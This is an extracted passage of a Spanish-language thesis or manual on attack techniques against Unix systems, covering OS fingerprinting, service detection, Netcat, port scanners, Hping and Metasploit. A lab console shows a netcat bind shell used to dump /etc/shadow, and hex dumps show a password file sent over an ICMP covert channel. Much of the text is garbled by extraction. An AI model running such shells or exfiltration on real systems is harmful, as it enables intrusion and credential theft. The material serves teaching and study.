Secuencia TCP Iniciales (o ISNs)100 (GCD).
b) Clculo de la Media del aumento de los Nmeros de Secuencia TCP
Inicial obtenidos (ISR).
c) Indice de predictibilidad de la secuencia de ISNs obtenida (SP). Es la
varianza de lo anterior. Estima la dificultad de predecir el siguiente
ISN de una secuencia conocida de 6 ISNs.
d) Evaluacin del algoritmo de generacin de Secuencias IP-ID para
paquetes TCP e ICMP (TI, II).
e) Booleano de Secuencia IP ID Compartida (SS). Si el destino comparte
la secuencia IP-ID entre los protocolos TCP e ICMP, este campo se
establece en S, que proviene de Shared, o Compartida.
f) Opciones de TCP (O o O1-O6). Nmap enva en los probes de este test
algunas opciones de TCP y aqu se almacenan las respuestas obtenidas.
g) Tamao de Ventana TCP Inicial (W o W1-W6). Slo se almacena el
tamao de ventana del paquete recibido por cada probe.
h) Respuesta (R): Si el host respondi; slo se almacena un Y o N.
i) Bits IP de No Fragmentacin en paquetes TCP e ICMP (DF, DFI). Se
almacena si los paquetes recibidos contenan el bit en cuestin
activado o no.
j) Valor TTL Inicial del campo IP (T) y su valor original estimado (TG).
Se almacena el TTL de las respuestas recibidas (todas son iniciales,
99 Entre parntesis al final de cada tem se encuentran los cdigos que el autor de Nmap le asign
dentro del documento al que se hace referencia ([NMAP_OS2]).
100 El Nmero de Secuencia TCP Inicial o ISN es el valor del campo TCP-Nmero de Secuencia
del primer paquete SYN+ACK que devuelve el host destino a un SYN enviado por Nmap a un
puerto abierto.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 69 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 71 de 229
Consola 12: Deteccin de Sistema Operativo con NMap Coincidencia de firma perfecta
Desde entonces,
surgieron varias herramientas que implementan esta tcnica 102, siendo las ms
destacadas Siphon103, Ettercap104 y quizs el ms popular, p0f105.
Dado que los paquetes SYN no requieren estmulo previo de ningn tipo (es
101 Sitio del Proyecto Honeynet: http://project.honeynet.org/
102 Herramientas Pasivas de OS Fingerprinting: http://www.networkintrusion.co.uk/osfp.htm
103 Si bien fue uno de los primeros en implementar fingerprinting pasivo, Siphon es una
herramienta ya en desuso; su Web es: http://siphon.datanerds.net
104 Ettercap es una herramienta que puede utilizarse para diferentes tareas y tambin incluye un
mdulo para hacer fingerprinting pasivo. URL: http://ettercap.sourceforge.net/
105 Sitio Web de P0F: http://lcamtuf.coredump.cx/p0f.shtml
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 72 de 229
coinciden en que las mtricas que caracterizan a los SOs a este nivel,
Encabezado IP:
Bit de No Fragmentacin IP
Encabezado TCP:
106 La opcin de escalamiento de ventanas permite definir tamaos de ventana TCP mayores que
los 65536 bytes que el campo Window Size del encabezado TCP original. Esta opcin est
definida en el RFC 1323, pg. 8: http://tools.ietf.org/html/rfc1323#page-8
107 El timestamp sirve para que un lado de la conexin pueda calcular el RTT de la conexin, con
el fin de descartar segmentos viejos duplicados, en un mecanismo llamado PAWS. Est
definido tambin en el RFC 1323, pg. 17: http://tools.ietf.org/html/rfc1323#page-17
108 La opcin SACK de TCP est documentada en el RFC 2018: http://tools.ietf.org/html/rfc2018
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 73 de 229
informacin que el listado de arriba, como se puede ver en la Consola Nro 13. All
lo que se puede ver es la base de firmas SYN, que es la modalidad tradicional y la
que mejores resultados brinda. La desventaja de esto es que hay que lograr de
alguna manera que el objetivo inicie conexiones con el equipo que est ejecutando
p0f, lo cual segn las circunstancias, puede ser muy difcil.
marcelo@saturno:~$ sudo cat /etc/p0f/p0f.fp
# Fingerprint entry format:
#
# wwww:ttt:D:ss:OOO...:QQ:OS:Details
#
# wwww
- window size (can be * or %nnn or Sxx or Txx)
#
"Snn" (multiple of MSS) and "Tnn" (multiple of MTU) are allowed.
# ttt
- initial TTL
# D
- don't fragment bit (0 - not set, 1 - set)
# ss
- overall SYN packet size (* has a special meaning)
# OOO
- option value and order specification (variable-see below)
# QQ
- quirks list (variable-see below)
# OS
- OS genre (Linux, Solaris, Windows)
# details - OS description (2.0.27 on x86, etc)
[...]
----------------- Linux ------------------[...]
S4:64:1:60:M*,S,T,N,W5:.:Linux:2.6 (newer, 1)
S4:64:1:60:M*,S,T,N,W6:.:Linux:2.6 (newer, 2)
S4:64:1:60:M*,S,T,N,W7:.:Linux:2.6 (newer, 3)
T4:64:1:60:M*,S,T,N,W7:.:Linux:2.6 (newer, 4)
[...]
----------------- Solaris ----------------[...]
S34:64:1:52:M*,N,W0,N,N,S:.:Solaris:10 (beta)
32850:64:1:64:M*,N,N,T,N,W1,N,N,S:.:Solaris:10 (1203?)
32850:64:1:64:M*,N,W1,N,N,T,N,N,S:.:Solaris:9.1
Las nicas diferencias apreciables son que la versin real de OpenBSD era
la 4.2 en vez de 3.9, y que la conexin de un FreeBSD 7.0 no fue identificada.
Para ningn cliente hubo actividad sospechosa o diferente a la normal.
con valores
en una
lgica
difusa,
como YES,
Devuelve resultados
111 Para ms documentacin (papers, presentaciones, etc.) sobre Fingerprinting Difuso, visitar el
siguiente enlace: http://sys-security.com/blog/published-materials/
112 RING: Acrnimo de Remote Identification, Next Generation Identificacin Remota, Nueva
Generacin.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 76 de 229
como alternativa.
de
SOs
pero
para
aplicaciones
servicios
especficos
115 La mayora de las relaciones Nmero de Puerto => Servicio los asigna el IANA (Internet
Assigned Numbers Authority); stas se consideran semi-estndares (ya que son una
recomendacin a seguir, no una obligacin), definida por un importante ente de Internet, que
controla los DNSs raz y las IPs asignadas, por ejemplo. Para ver un listado de los puertos y
servicios reconocidos por el IANA, ver este enlace: http://www.iana.org/assignments/portnumbers. Sin embargo, esto no impide que se pueda hacer caso omiso de esta recomendacin.
Por otro lado, existen servicios no enumerados en el listado y que sin embargo se conoce qu
puerto utilizan (aun producindose colisiones de nmeros de puerto en algunos casos). Ms
informacin: http://en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 79 de 229
5.2.2.1. Amap
Amap posee dos archivos de firmas; uno de triggers (o disparadores)
llamado appdefs.trig y otro de respuestas conocidas nombrado como
appdefs.resp. El primero corresponde a secuencias de bytes o strings (cadenas
de texto) a enviar apenas se establece una conexin (en el caso de TCP). El
segundo pertenece a las respuestas de aplicaciones conocidas, y pueden estar
relacionadas a un trigger o no, ya que hay servicios/protocolos en donde el
servidor enva un string o un conjunto de bytes al cliente en primera instancia. Es
decir, una respuesta puede ser generada por un estmulo en la conexin apenas
iniciada (el trigger) o recibida inmediatamente sin enviar nada.
En la Consola 16 se muestra el formato de archivo de triggers de Amap
junto con algunos ejemplos. Los primeros tres muestran triggers de los servicios
quizs ms comunes, como son HTTP, SMTP y FTP y se encuentran en formato
ascii (texto plano). Para los tres ltimos (DNS genrico en puertos TCP/UDP y
DNS Bind118) es necesario un trigger binario. Con la utilizacin de triggers
binarios, ya puede apreciarse la ventaja de usar este tipo de herramientas a
comparacin de telnet o netcat a mano.
Consola 16: Formato del archivo de Triggers de Amap (traducido del ingls)
# This is the responses file "appdefs.resp" for amap
#
# Las Respuestas tienen el siguiente formato:
#
# NAME:[TRIGGER,[TRIGGER,...]]:[IP_PROTOCOL]:
[MIN_LENGTH,MAX_LENGTH]:RESPONSE_REGEX
#
# NAME El nombre que imprime amap si la definicin coincide
#
con la respuesta recibida del servicio
# TRIGGER (opcional) Requiere que los datos recibidos hayan sido
#
la respuesta de un trigger con este nombre en
#
appdefs.trig. Puede separar varios con una coma.
# IP_PROTOCOL (opcional) Requiere que la respuesta recibida venga va
#
el protocolo tcp o udp. Por defecto son ambos. [...]
# LENGTH (opcional) El mnimo y mximo largo de la respuesta
#
recibida, separado por una coma o un nico nmero [...]
# RESPONSE Esta es una expresin regular de Perl (man perlre) que
#
ser evaluada en los datos recibidos
# Ejemplos:
[...]
dns-bind9:dns-bind:udp::^...[\x00-\x7e]..........................\xc0
dns-bind8:dns-bind:udp::^...[\x00-\x7e]..........................
[^\xc0]
dns-djb:dns-bind:udp::^...[\x80-\x83].*version.bind
[...]
http-apache-1::tcp::^HTTP/.*\nServer: Apache/1
http-apache-2::tcp::^HTTP/.*\nServer: Apache/2
[...]
tftp::udp::^\x00[\x03\x05]\x00
Consola 17: Formato del archivo de Respuestas de Amap (traducido del ingls)
por la base de firmas, como por ejemplo las relacionadas con los triggers de DNS
vistos previamente, unas respuestas que tpicamente el servidor web Apache
devuelve a los clientes (no relacionado con ningn trigger), y una respuesta a un
paquete UDP enviado a un servidor TFTP. Este archivo de respuestas conocidas
razonablemente excede la cantidad de triggers conocidos, ya que varias respuestas
pueden estar asociadas a un trigger o a ninguno; lo ideal sera que cada respuesta
identifique una o varias versiones de iguales o diferentes servidores.
El funcionamiento de Amap es sencillo, y se puede resumir en los siguientes
pasos [SANS_AMAP]:
1. Inicializacin, carga de archivos de triggers, respuestas, etc.
2. Se reciben, entre otros parmetros de entrada, host destino y puertos
TCP/UDP a analizar.
3. Se intenta establecer conexiones en paralelo con el host y puerto
normalmente (siendo configurable la cantidad de conexiones simultneas).
4. Por cada conexin iniciada correctamente se enva un trigger que no haya
sido probado. Se envan en orden secuencial, tal como se encuentran en el
archivo de firmas.
5. Por cada recepcin correcta de datos, se comprueba el archivo de
respuestas y se evala si hay coincidencia o no.
6. Se imprimen las respuestas coincidentes.
marcelo@saturno:~/src/amap-5.2$ ./amap -v 192.168.0.30 2121 22
Using trigger file ./appdefs.trig ... loaded 35 triggers
Using response file ./appdefs.resp ... loaded 390 responses
Using trigger file ./appdefs.rpc ... loaded 450 triggers
amap v5.2 (www.thc.org/thc-amap) started at 2008-04-06 13:51:59 MAPPING mode
Total amount of tasks to perform in plain connect mode: 56
Protocol on 192.168.0.30:2121/tcp (by trigger http-get) matches ftp
Protocol on 192.168.0.30:22/tcp (by trigger http-get) matches ssh
Protocol on 192.168.0.30:22/tcp (by trigger http-get) matches sshopenssh
Waiting for timeout on 1 connections ...
Unidentified ports: none.
amap v5.2 finished at 2008-04-06 13:52:00
marcelo@saturno:~/src/amap-5.2$
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 82 de 229
5.2.2.2. Nmap
Nmap en este aspecto no difiere demasiado en su comportamiento con el
Amap, salvo que su base de firmas es nica y est ms actualizada (ya que la
comunidad que lo rodea es mayor) y sus capacidades y posibilidades son mayores,
an a costa de mayor complejidad. Tambin cumple un mejor papel teniendo en
cuenta el objetivo de pasar desapercibido y brindar ms informacin y flexibilidad
a sus usuarios.
A lo largo de su ejecucin realiza un escaneo de puertos estndar (tal como
fue descripto en el captulo anterior) y, quedndose con los puertos abiertos,
detecta los servicios de esta manera [NMAP_VSCAN]:
1. Establece una conexin con cada puerto abierto.
2. Si se establece la conexin sin problemas, Nmap en primer lugar comienza
lo que se denomina el Null Probe, que consiste en no enviar nada y
esperar 6 segundos con la intencin de recibir datos. Aqu es donde se
contempla a los servicios y protocolos que envan Banners o informacin
diversa inmediatamente luego de iniciarse la conexin con el cliente.
3. Si se reciben datos, se busca en el archivo de firmas una coincidencia
relacionada con este probe.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 83 de 229
3.1.Si
hay
coincidencia
completa
(dura119
como
describe
la
Probe:
Sintaxis: Probe
match:
Sintaxis: match
<nombre_servicio>|<patrn>|[informacin de versin]
Null Probe + Opciones del Probe Conjunto match del Null Probe.
[...]
El primer probe del archivo es el Null, seguido por unos cuantos match con
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 86 de 229
6.1. Netcat
Netcat123 es quiz la herramienta ms verstil y popular que existe para
hackear en la red; tanto es as que se lo suele conocer como la navaja suiza
multiuso. La versin original (que data de 1996) fue posteriormente mejorada y
adaptada por varios desarrolladores y proyectos, por lo que sus derivados pueden
encontrarse bajo el nombre de nc, ncat, pnetcat, socat, sock, socket y sbd
[WIKI_NC],
Captulo 6. - 6.1.Netcat
[SUN_LINK]
ejecutable esttico para depender lo menos posible del sistema operativo y el software
instalado en el sistema comprometido. Ver: http://en.wikipedia.org/wiki/Static_library
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 88 de 229
Captulo 6. - 6.1.Netcat
Consola 20: Netcat como cliente de aplicaciones de red, en este caso HTTP y POP3
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 89 de 229
Captulo 6. - 6.1.Netcat
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 90 de 229
Captulo 6. - 6.1.Netcat
(Servidor)
root@ubuntu-server:~$ while [[ ! -e /tmp/.cerrar
-e /bin/sh; done
]];do nc -l -p 15679
(Cliente)
marcelo@saturno:~$ nc 192.168.0.60 15679
ls -l
total 104
drwxr-x--- 3 marcelo marcelo 4096 2007-01-27 16:56
completo_grafico.html
-rw-r--r-- 1 marcelo marcelo 42482 2007-01-27 16:56 completo.html
-rw------- 1 marcelo marcelo 20080 2007-01-27 16:56 completo.nbe
-rw-r--r-- 1 marcelo marcelo 11818 2007-01-27 15:17 defaultfullplugins.html
-rw-r--r-- 1 marcelo marcelo 13014 2007-01-27 14:38 default.html
drwxr-xr-x 2 marcelo marcelo 4096 2007-01-27 16:32 exploits
drwxr-xr-x 2 marcelo marcelo 4096 2007-01-27 13:05 tools
pwd
/home/marcelo
hostname
ubuntu-server
uname -a
Linux ubuntu-server 2.6.15-51-server #1 SMP Tue Feb 12 17:12:18 UTC
2008 i686 GNU/Linux
(Ctrl+C)
marcelo@saturno:~$ nc 192.168.0.60 15679 > server_shadow
cat /etc/shadow
touch /tmp/.cerrar
(Ctrl+C)
marcelo@saturno:~$ nc 192.168.0.60 15679
(UNKNOWN) [192.168.0.60] 15679 (?) : Connection refused
marcelo@saturno:~$ cat server_shadow
root:*:13526:0:99999:7:::
daemon:*:13526:0:99999:7:::
bin:*:13526:0:99999:7:::
sys:*:13526:0:99999:7:::
sync:*:13526:0:99999:7:::
games:*:13526:0:99999:7:::
man:*:13526:0:99999:7:::
lp:*:13526:0:99999:7:::
mail:*:13526:0:99999:7:::
news:*:13526:0:99999:7:::
uucp:*:13526:0:99999:7:::
proxy:*:13526:0:99999:7:::
www-data:*:13526:0:99999:7:::
backup:*:13526:0:99999:7:::
list:*:13526:0:99999:7:::
irc:*:13526:0:99999:7:::
gnats:*:13526:0:99999:7:::
nobody:*:13526:0:99999:7:::
dhcp:!:13526:0:99999:7:::
syslog:!:13526:0:99999:7:::
klog:!:13526:0:99999:7:::
marcelo:$1$t03HQAhF$/CP/w2tw5Rn1DXrJP0eF21:13540:0:99999:7:::
sshd:!:13540:0:99999:7:::
ftp:!:13944:0:99999:7:::
marcelo@saturno:~$
Consola 21: Consola Remota va Netcat. En negrita estn los comandos tipeados por el cliente
Captulo 6. - 6.1.Netcat
Captulo 6. - 6.1.Netcat
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 94 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 95 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 96 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 97 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 99 de 229
vulnerabilidad.
Lo
mismo
sucede
con
la
explotacin
de
Por host: Son ejecutados por host a escanear, ya que pueden estar
asociados a tareas con el nombre de dominio, situacin dentro de la Red
destino y su firewall, IP, etc.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 102 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 103 de 229
id="Anonymous FTP"
description="Checks to see if a FTP server allows anonymous logins"
author = "Eddie Bell <ejlbell@gmail.com>"
license = "See nmaps COPYING for licence"
categories = {"intrusive"}
require "shortport"
portrule = shortport.port_or_service(21, "ftp")
action = function(host, port)
local socket = nmap.new_socket()
local result
local status = true
local isAnon = false
local err_catch = function()
socket:close()
end
local try = nmap.new_try(err_catch())
socket:set_timeout(5000)
try(socket:connect(host.ip, port.number, port.protocol))
try(socket:send("USER anonymous\r\n"))
try(socket:send("PASS IEUser@\r\n"))
while status do
status, result = socket:receive_lines(1);
if string.match(result, "^230") then
isAnon = true
break
end
end
socket:close()
if(isAnon) then
return "FTP: Anonymous login allowed"
end
end
Consola 25: Fuente del Script para NSE que detecta si un Servidor FTP acepta login annimo
6.3. Unicornscan
Los desarrolladores de Unicornscan lo definen como un framework135
distribuido de Estmulo/Respuesta utilizando como medio la red, por lo que no
slo es un port scanner. Se distribuye bajo la licencia GPL v2, y su objetivo es
implementar un stack TCP/IP distribuido en modo usuario136. Est diseado para
ser escalable, preciso, flexible y eficiente 137, que no es lo mismo que solamente
135 Ver Glosario: Framework, pg. 61.
136 El software en modo usuario es aquel que es ejecutado por el SO como un proceso ms del
usuario, y bajo sus privilegios, a diferencia de los procesos o mdulos que se ejecutan en el
modo ncleo (o kernel). Ver: http://en.wikipedia.org/wiki/Kernel_mode
137 Sitio del Proyecto Unicornscan: http://www.unicornscan.org/
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 104 de 229
Captulo 6. - 6.3.Unicornscan
ser rpido.
Algunas de sus caractersticas ms importantes son:
138 Pcap es la librera ms popular para captura y almacenamiento de paquetes de red; la mayora
de sniffers, scanners y analizadores de red lo utilizan. Ver: http://en.wikipedia.org/wiki/Pcap
139 Ver Glosario: Hilos (Threads), pg. 62.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 105 de 229
Captulo 6. - 6.3.Unicornscan
140 Cluster: Conjunto de computadoras que trabajan en grupo y actan como un nodo nico e
indivisible, en pos de lograr un objetivo sumando el recurso de cada uno de sus componentes.
Ver: http://en.wikipedia.org/wiki/Computer_cluster
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 106 de 229
Captulo 6. - 6.3.Unicornscan
marcelo@saturno:~/src/unicornscan/bin$ sudo ./unicornscan -v ciclon
adding 192.168.0.30/32 mode `TCPscan' ports `7,9,11,13,18,19,2123,25,37,39,42,49,50,53,65,67-70,79-81,88,98,100,105-107,109111,113,118,119,123,129,135,137-139,[...]' pps 300
using interface(s) eth0
scaning 1.00e+00 total hosts with 3.38e+02 total packets, should take a
little longer than 8 Seconds
sender statistics 294.4 pps with 338 packets sent total
listener statistics 8 packets recieved 0 packets droped and 0 interface
drops
TCP open
ftp[
21]
from 192.168.0.30 ttl 64
TCP open
ssh[
22]
from 192.168.0.30 ttl 64
TCP open
domain[
53]
from 192.168.0.30 ttl 64
marcelo@saturno:~/src/unicornscan/bin$
6.4. Scanrand
Este portscanner est includo en una suite de herramientas de seguridad
llamada Paketto Keiretsu141, desarrollada por Dan Kaminsky. Tiene como
primer y ms importante objetivo hacer su trabajo lo ms rpido posible;
adems, posee un diseo parecido al de Unicornscan (aunque ste es posterior).
La diferencia principal reside en que Scanrand no posee un proceso de control
maestro (no lo necesita, ya que slo es un Port Scanner), y no crea N procesos
enviadores o senders.
En su meta de alcanzar el mximo rendimiento en un escaneo, esta
herramienta innov en algunos aspectos. Por ejemplo, al implementar un proceso
que slo enve mensajes y otro que slo los reciba sin comunicarse entre s; y
tambin al implementar y mejorar, en un proceso de espacio del usuario, parte de
la mquina finita de estados de TCP142.
Para esto su autor, Dan Kaminksy, desarroll la tcnica del Inverted SYN
Cookie, o SYN Cookie Inverso, que intenta aplicar la tcnica de las SYN
Cookies143 pero del lado del cliente (quien realiza el portscan).
A grandes rasgos [SANS_SCANRAND], Scanrand funciona de la siguiente
manera:
I. Crea un proceso enviador (sender) y el proceso principal se convierte en
recibidor o escuchador (listener o receiver). Genera un nmero
clave o semilla (seed), aleatorio por defecto, que se utilizar en toda la
141 URL: http://www.doxpara.com/
142 Para ver la FSM (Finite State Machine Mquina de Estados Finitos) de TCP, ir al Anexo A.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 107 de 229
Captulo 6. - 6.4.Scanrand
Captulo 6. - 6.4.Scanrand
(HMAC-SHA-1
((IPOrig+IPDest+PtoOrig+PtoDest),
Clave),
32bits)
Captulo 6. - 6.4.Scanrand
paquetes que provienen ms tarde, segn la cantidad de tiempo que se espera por
una respuesta.
En conclusin, el proceso de escaneo de puertos de Scanrand es asincrnico,
escalable y mucho ms rpido que un escaneo secuencial (puerto por puerto y host
por host). La desventaja que tiene es que es poco probable que pase desapercibido
para los IDSs o herramientas de monitoreo, aunque est bien claro que no es la
intencin de Scanrand evitarlas; adems, hay que tener en cuenta que en este caso
la velocidad va en desmedro de la precisin. Es por esto que Scanrand puede ser
muy til para redes locales grandes y rpidas, con buen ancho de banda y baja
latencia, o donde no importe pasar desapercibido para el administrador.
Port Scanning avanzado, como por ejemplo el Idle Scan (no casualmente,
ya que el autor de Hping fue el que desarroll este tipo de portscan).
Traceroute bajo todos los protocolos soportados (no slo UDP). Es decir,
se puede hacer un traceroute enviando paquetes IP con TTL incrementales
pero con payload TCP, por ejemplo.153
Fingerprinting de SOs.
Muchos otros.
Hping acepta con diferentes opciones de la lnea de comandos el modo
(ping por defecto), el tipo (ICMP, TCP, UDP) de paquetes a enviar, as como las
diferentes opciones de sus encabezados.
152 Para ver ms de PMTUD: Visitar http://en.wikipedia.org/wiki/Path_mtu_discovery, o bien leer
el Apartado 11.7 de [TCP/IP_Ill]
153 Para consultar ms informacin sobre Traceroute, ver el Captulo 8 de [TCP/IP_Ill].
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 111 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 112 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 113 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 114 de 229
el router y/o firewall, que rechaza los paquetes que simulan ser de un servidor
DNS. Luego con TTL igual a 8 no hay respuesta, seguramente es porque el
datagrama lleg a destino (200.68.121.140). Segundo, se enva un traceroute con
el puerto TCP 80 como destino: evidentemente el firewall (si lo hay) permite que
este puerto destino pase por l.
Tambin es de destacar la facilidad con la que Hping permite armar covert
channels sobre cualquier protocolo y puerto soportado, especialmente para
puertas traseras: en la Consola 30 se puede ver cmo se configura un canal
alternativo para enviar archivos utilizando el protocolo ICMP, utilizando el
payload del protocolo mismo (de 120 bytes) para enviar el contenido del archivo
de claves de un sistema FreeBSD.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 117 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 118 de 229
Consola 30: Ejemplo de un Covert Channel para Transferencia de archivos sobre ICMP
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 119 de 229
00
00
00
61
44
72
32
3a
0a
30
72
17
94
02
63
3a
2e
30
35
23
30
48
31
db
08
6b
20
70
30
36
0a
6c
96
8f
00
64
73
61
35
20
72
24
5b
00
40
6f
72
73
2f
62
6f
50
1f
00
04
6f
63
73
30
72
6f
43
00
40
18
72
2f
77
36
6f
74
4f
0c
01
12
23
65
64
2f
6f
3a
62
29
1d
00
20
74
2c
30
6b
24
37
e1
69
00
24
63
76
36
73
31
57
a2
c0
63
46
2f
20
20
20
24
64
26
a8
6c
72
6d
31
32
45
71
67
08
00
61
65
61
2e
30
78
46
52
00
1e
76
65
73
34
3a
70
71
6c
45
c0
65
42
74
30
31
20
6b
51
00
a8
62
53
65
20
39
24
2e
64
..1.[...)..&..E.
......@..i......
....@.....claveb
ackdoor# $FreeBS
D: src/etc/maste
r.passwd,v 1.40
2005/06/06 20:19
:56 brooks Exp $
.#.root:$1$qFqk.
00l$PCOb7WdgRlQd
rH
00
00
00
61
44
72
32
3a
0a
30
72
0c
94
1e
63
3a
2e
30
35
23
30
48
29
74
00
6b
20
70
30
36
0a
6c
e1
38
00
64
73
61
35
20
72
24
a2
00
48
6f
72
73
2f
62
6f
50
26
00
04
6f
63
73
30
72
6f
43
00
40
18
72
2f
77
36
6f
74
4f
17
01
12
23
65
64
2f
6f
3a
62
31
84
00
20
74
2c
30
6b
24
37
96
c0
00
24
63
76
36
73
31
57
5b
c0
63
46
2f
20
20
20
24
64
1f
a8
6c
72
6d
31
32
45
71
67
08
00
61
65
61
2e
30
78
46
52
00
02
76
65
73
34
3a
70
71
6c
45
c0
65
42
74
30
31
20
6b
51
00
a8
62
53
65
20
39
24
2e
64
..)..&..1.[...E.
..t8..@.........
....H.....claveb
ackdoor# $FreeBS
D: src/etc/maste
r.passwd,v 1.40
2005/06/06 20:19
:56 brooks Exp $
.#.root:$1$qFqk.
00l$PCOb7WdgRlQd
rH
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 120 de 229
00
00
00
61
30
20
63
72
72
73
6e
17
94
02
63
3a
26
61
3a
6e
65
3a
31
b8
08
6b
30
3a
6c
2a
65
72
96
ba
00
64
3a
2f
2f
3a
2d
3a
5b
00
17
6f
3a
72
62
30
61
2f
1f
00
21
6f
30
6f
69
3a
67
72
00
40
18
72
3a
6f
6e
30
61
6f
0c
01
12
76
30
74
2f
3a
69
6f
29
40
01
56
3a
3a
62
3a
6e
74
e1
3e
00
48
43
2f
61
30
20
3a
a2
c0
63
54
68
75
73
3a
53
0a
26
a8
6c
61
61
73
68
30
75
64
08
00
61
6c
72
72
0a
3a
70
61
00
1e
76
4b
6c
2f
74
42
65
65
45
c0
65
30
69
6c
6f
6f
72
6d
00
a8
62
3a
65
6f
6f
75
75
6f
..1.[...)..&..E.
......@.@>......
.....!....claveb
ackdoorvVHTalK0:
0:0::0:0:Charlie
&:/root:/usr/lo
cal/bin/bash.too
r:*:0:0::0:0:Bou
rne-again Superu
ser:/root:.daemo
n:
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 121 de 229
Inyeccin de cdigo
Escalado de Privilegios
Por otra parte, los exploits pueden clasificarse en ([WIKI_EXPL]):
Remotos
Locales
Segn su efecto
relativa baja
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 125 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 126 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 127 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 128 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 129 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 130 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 131 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 132 de 229
etc.
Lo interesante de este diagrama de funcionamiento es que sirve en forma
genrica, y puede aplicarse a cualquier herramienta similar, ya que representa la
manera generalmente aceptada de atacar el problema de cmo hacer un
exploit y cmo funcionan.
Por ejemplo, en la Consola 31 puede verse el cdigo fuente de un exploit
includo en el MSF que aprovecha una vulnerabilidad en PHP. Bsicamente se
divide en dos partes: una de inicializacin (la funcin initialize), que permite
integrarse al framework, ejecutando una serie de definiciones; mientras que el
exploit en s se ejecuta en la funcin php_exploit, que como se puede ver, slo
consta de unas pocas lneas.
Sin embargo, para reducir al mnimo la cantidad de lneas de esta manera,
fue imprescindible utilizar algunas clases y funciones disponibles en el
Framework, por ejemplo de los paquetes Exploit::Remote y Rex::Text. En
cambio, si el exploit hubiera tenido que escribirse por separado, aislado del
MSF, en un lenguaje como C, seguramente sera mucho ms largo, difcil de
estudiar y de modificar, adems de programar.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 133 de 229
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 134 de 229
plataforma.
b) Encoding: Sirve para ofuscar161 el contenido de un payload. Es
importante utilizarlo en caso de tener la certeza de que hay un IDS
verificando el trfico que se enva al objetivo.
c) Jobs (Trabajos): En ocasiones es necesario dividir una tarea en varios
trabajos. Los Jobs o trabajos se definen como tems de trabajo finitos
que tienen una tarea especfica. De esta manera, la idea es facilitar la
coordinacin de estos trabajos con funciones especficas para ello.
d) Logging: Es un servicio de mensajes de estado (Logs) dentro del
Framework, clasificado por niveles (de 0 a 3).
e) Post-exploitation: Este mdulo provee servicios ya incorporados para
utilizar remotamente el objetivo una vez que el exploit tuvo xito. Por
ejemplo, la clase Stdapi162
La
clase
Stdapi
se
encuentra
en
el
archivo
ubicado
en
/framework-
3.1/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb.
Tcnicas comunes de Ataque a equipos con sistema operativo Unix o derivados - Pg. 136 de 229
los exploits. El problema con los NOPs triviales es que son fcilmente
identificables en un payload por un IDS. Con este generador, es
sencillo crear NOPs que funcionen igual, pero de longitud variable y
pseudoaleatorios.
d) Payload: Proveen cdigo al Framework que puede ser ejecutado luego
de que un exploit tenga xito al controlar el flujo de ejecucin. MSF
dispone de unas cuantas opciones, y para crear uno nuevo hace falta
crear una clase que herede de Msf::Payload. De esta manera pueden
agregarse acciones personalizadas, o soportar otra arquitectura que no
est disponible previamente.
e) Auxiliary Modules: Se trata de utilidades incluidas en el MSF que no
tienen que ver directamente con explotar un objetivo, sino con
actividades relacionadas: ejecutar un Port Scan, provocar un DoS163
conocido en un software, loguearse en una Base de Datos, interactuar
con algn Servicio, detectar la versin de un servidor, etc.
6. Framework Plugins: Para diferenciarlo de los mdulos, puede pensarse a
los plugins como piezas diseadas para modificar el Framework mismo. El
objetivo puede ser cualquiera, ya que en primera instancia se permite hacer
